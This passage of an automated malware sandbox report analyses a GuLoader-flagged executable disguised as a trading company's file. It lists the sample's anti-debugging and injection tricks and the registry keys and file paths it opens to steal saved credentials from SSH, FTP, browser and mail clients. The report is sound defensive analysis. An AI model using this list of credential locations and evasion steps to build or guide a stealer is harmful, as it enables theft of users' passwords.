Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1611B rdtsc 1_2_03D1611B
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D17601 LdrInitializeThunk, 1_2_03D17601
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D19D8D mov eax, dword ptr fs:[00000030h] 1_2_03D19D8D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D18769 mov eax, dword ptr fs:[00000030h] 1_2_03D18769
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D19D39 mov eax, dword ptr fs:[00000030h] 1_2_03D19D39
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D140DC mov eax, dword ptr fs:[00000030h] 1_2_03D140DC
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D16245 mov eax, dword ptr fs:[00000030h] 1_2_03D16245
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1347D mov eax, dword ptr fs:[00000030h] 1_2_03D1347D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D18E26 mov eax, dword ptr fs:[00000030h] 1_2_03D18E26
Enables debug privileges
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process created: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe 'C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe'
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook